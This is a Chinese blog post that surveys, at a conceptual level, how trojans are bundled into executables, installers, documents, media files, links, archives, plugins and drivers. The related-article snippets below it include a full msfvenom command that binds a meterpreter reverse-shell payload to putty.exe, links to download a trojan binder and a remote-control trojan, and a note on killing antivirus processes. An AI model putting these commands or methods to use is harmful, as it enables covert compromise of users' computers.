常见的木马捆绑方式

于 2024-08-20 20:26:14 发布
阅读量338 收藏
点赞数 6
分类专栏: 网络安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57836225/article/details/141367751
版权

常见的木马捆绑技术有很多种,主要包括以下几方面:

一、文件捆绑

1. 可执行文件捆绑:将木马与正常可执行文件捆绑,用户运行时激活木马。

2. 文档文件捆绑:利用文档软件漏洞或宏功能,在打开文档时激活木马。

 二、软件安装包捆绑

 1. 利用正规软件安装包:隐藏木马于热门软件安装包中,随软件安装进入系统。

2. 伪装成软件更新包:制作似官方发布的更新包,实际包含木马。

 三、网页脚本捆绑

 1. 通过恶意网页:在网页中嵌入恶意脚本,用户访问网页时自动下载安装捆绑木马的文件。

2. 利用广告网络:将木马捆绑在网络广告中,用户浏览带广告的网页时可能被感染。

 四、图片捆绑

利用图片文件格式漏洞或在元数据中嵌入恶意代码,用户查看图片时触发木马激活。

 五、视频捆绑

通过视频文件格式解析漏洞或在元数据中隐藏恶意指令,用户播放视频时激活木马。

 六、链接捆绑

 1. 恶意链接伪装:将恶意链接伪装成正常链接,用户点击后被引导至恶意网站下载木马。

2. 链接重定向:篡改合法网站链接,将用户重定向到恶意网站感染木马。

 七、压缩文件捆绑

将木马与其他文件打包进压缩文件,用户解压使用内容时触发木马运行。

 八、插件捆绑

 1. 浏览器插件捆绑:与浏览器插件捆绑,随插件安装进入系统。

2. 软件插件捆绑:伪装成合法插件与常用软件捆绑。

 九、驱动程序捆绑

将木马与虚假或恶意修改的驱动程序捆绑,用户安装硬件或更新驱动时可能误装木马。

阿贾克斯的黎明
关注
专栏目录
亲手实践图片木马捆绑工具(BD2.Net Injector By BD2)
边城浪子的博客
05-15 6631
BD2.Net Injector By BD2工具下载地址: 链接:https://pan.baidu.com/s/1KS_wQjwNpWDFBZCnLMThYA 提取码:cziq 远控木马下载地址: 链接:https://pan.baidu.com/s/16CNDrQ3CCokuFetvSqWnRA 提取码:o1wa 本人测试图片木马上线不成功,木马上线是没有问题的。 ...
木马捆绑器设计思路和源码
liujiayu2的专栏
10-10 4074
木马捆绑是把一个有界面的正常程序,和一个后门程序捆绑在一起从而制作一个木马木马捆绑器一般是三个程序和在一起,程序1:正常程序,程序2:后门程序,程序3: 一个加载。这个加载器的作用就是包容、释放、加载这前面两个个程序, MZ******************************** ********************************** *************
Metasploit 实现木马生成、捆绑及免杀
阿里云云栖号
10-08 5332
简介:在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。本次实验我们将学习如何通过Metasploit的msfvenom命令来生成木马捆绑木马以及对木马进行免杀处理。木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。 实验环境: Kali Linux 知识点: msfvenom 如何生.
使用 VB 开发的木马捆绑程序源代码。
成功者找方法,失败者找借口!
06-14 2180
这是很久以前回答人家一道关于使用 VB 捆绑木马的问题,有些 API 只可用于 Win9x,回复如下:其实不需要记录文件的大小,我为了方便,直接用捆绑工具把我的程序与木马合并在一起,结果被杀毒软件给查出来了,后来我就想到把木马放到资源文件中,待程序运行时先把杀毒软件的进程给KILL掉,然后再把它释放出来,效果很好,并且杀毒软件也查不到,以下是我的程序源代码。里面还有很多与它不相关的代码,我是用来杀
信息安全技术实践之木马捆绑模拟实验小记
小啊呜的博客
09-22 2840
信息安全技术实践之木马捆绑模拟实验小记 实践任务描述 实现过程记录 叮嘟!这里是小啊呜的学习课程资料整理。好记性不如烂笔头,今天也是努力进步的一天。一起加油进阶吧!
发现一个木马的新的捆绑方式
《Java程序员,上班那点事儿》——清华大学出版社
02-01 6735
大家注意!!近期发现某些非官方站点上下载的Tomcat安装包中有后门,进而成为黑客安装木马的工具,黑客可以很轻易的下载上传该服务器上的任何文件,再次提示:请务必从官方站点下载Tomcat!! 钟声 2012-2-1 @360运营专员 @金山毒霸微服务-赵言 我的微博:http://weibo.com/useway
ATT&CK防御绕过-木马隐藏捆绑技术-winrar自解压和文件名反转
u013797594的博客
05-09 3119
ATT&CK防御绕过-木马隐藏和捆绑技术-winrar自解压和文件名反转
自己动手做QQ木马--文件绑定篇(转)
cuemes08808的博客
06-03 422
自己动手做QQ木马--文件绑定篇(转)代码如下: //根据返回值判断是否继续执行本文件 bool CBindFile::Initiate() { int i = 0, k = 0; DWORD dwError...
木马捆绑检测器
06-29
木马捆绑检测器】是一种专门用于检测计算机文件中是否存在木马捆绑的工具。在互联网环境中,木马病毒常通过捆绑其他正常软件的方式进行传播,用户在不知情的情况下下载安装,可能会导致系统安全受到威胁。这款检测...
图片和木马文件捆绑,打开图片中了木马-运维安全笔记
06-30
图片和木马文件捆绑是一种常见的恶意攻击方式,攻击者可以将木马程序与图片文件捆绑在一起,目标用户在打开图片时,木马程序就会被执行从而感染计算机系统。本文将详细介绍图片和木马文件捆绑的原理、制作过程和防御...
exebinder捆绑软件及几个用以捆绑的小游戏
05-25
exebinder捆绑软件及一些小游戏,在做完木马后,常常需要此文件用以捆绑木马和游戏软件。能让别人主动去下载安装木马,很好的隐藏木马
文件捆绑
01-13
文件捆绑器可用来将二个不同的可执行文件合并成一个文件,运行合并后的文件等同于同时运行合并前的二个文件,并提供同步和异步运行二种方式,操作十分简便。 注意:     如果文件编释后不能运行的原因可能是: 1、请把它置为RELEASE版再编释。 2、可能是编释器设置不同,使最终生成文件大小不同,请把您RELEASE版编释后的文件大小记下,在CBindFileDlg类中的初始对话框类OnInitDialog中的最后,把原来的文件大小184K,替换后您新编释后的文件大小
吾爱EXE文件捆绑打包机(文件捆绑机)V18.8.18 免费版.rar
02-08
exe文件捆绑,来自网络
木马捆绑克星 v2.5 Build 0503
10-30
要用于检测木马文件捆绑,新版本加入了静态功能分析,可以判断可执行文件是否具有修改注册表、网络通讯、外壳和其他特征v2.5 Build 0503更新:使用自主开发的新一代引擎SharpShield(RC1),支持静态功能分析技术 代码...
木马捆绑克星V2.5.rar木马捆绑克星V2.5.rar
01-17
木马捆绑克星V2.5:网络安全的守护者》 在当今互联网时代,木马病毒已经成为威胁用户计算机安全的一大隐患。木马捆绑克星V2.5是一款专门针对此类威胁而设计的安全软件,致力于保护用户的电脑免受木马捆绑攻击。这...
利用msfvenom制作绑定攻击代码的木马程序
m0_43406494的博客
11-13 1074
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.94.135 LPORT=7777 -x putty.exe -k -f exe -o payload.exe o参数指定输出文件名,这里使用payload.exe,一般会改成一些人畜无害的文件名 -x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。绑定程序自定义,只要能引诱到目标运行它,这里随便选用putty.exe 选用payload use expl
我的软件被流氓软件捆绑了-有人竟然如此无耻
huangxiansheng1980的专栏
09-07 2823
今天本来想看看我的软件-ChangePictureOpacity都有什么网站收录,结果用搜索引擎一搜,结果搜出来 ChangePictureOpacity.exe大小18.6M,有2个地方有这个文件下载: http://dl.vmall.com/c0mfidv0ba http://www.vdisk.cn/down/index/10481084 从页面的下载连接显示,第一个
木马远程连接与攻击
shatianyzg的博客
05-17 695
木马远程连接与攻击
kali实现木马捆绑
最新发布
10-14
我很抱歉,我不能回答关于制作恶意软件的问题,因为这是不道德和非法的行为。我的设计目的是为了帮助人们解决问题和提供有用的信息,而不是鼓励犯罪行为。请问还有其他问题我可以回答吗? 相关问题: 1. 什么是Kali Linux? 2. Kali Linux有哪些常用的安全工具? 3. 如何使用Kali Linux
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值